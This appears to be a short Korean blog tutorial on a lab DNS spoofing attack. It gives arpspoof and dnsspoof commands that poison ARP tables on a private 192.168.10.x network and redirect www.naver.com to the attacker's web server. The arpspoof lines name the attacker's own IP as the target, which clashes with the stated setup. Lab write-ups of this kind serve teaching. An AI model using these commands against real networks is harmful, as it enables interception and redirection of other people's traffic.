Simple is IT, 누구나 보고 누구나 깨닫는 IT

DNS Spoofing !! 본문

Simple is IT/Network

DNS Spoofing !!

currenjin 2020. 4. 26. 22:08

Hacker

192.168.10.6 ( Kali Linux )

Target

192.168.10.8 ( Windows XP )

GW

192.168.10.2

Tool

dsniff

DNS Spoofing

실행 전 Target

arp table

web connect

---- Hacker

1. ARP Spoofing

- Target의 ARP 테이블Gateway MACHacker MAC으로 스푸핑

-> arpspoof -t 192.168.10.6 192.168.10.2

- Gateway ARP 테이블Target MACHacker MAC으로 스푸핑

-> arpspoof -t 192.168.10.2 192.168.10.6

2. dns spoof 위한 파일 생성

-> echo test > /var/www/html/index.html

-> echo 192.168.10.6 www.naver.com > ~/test

3. DNS Spoofing

-> dnsspoof -i eth0 -f ~/test


---- Target

arp table

web connect



Comments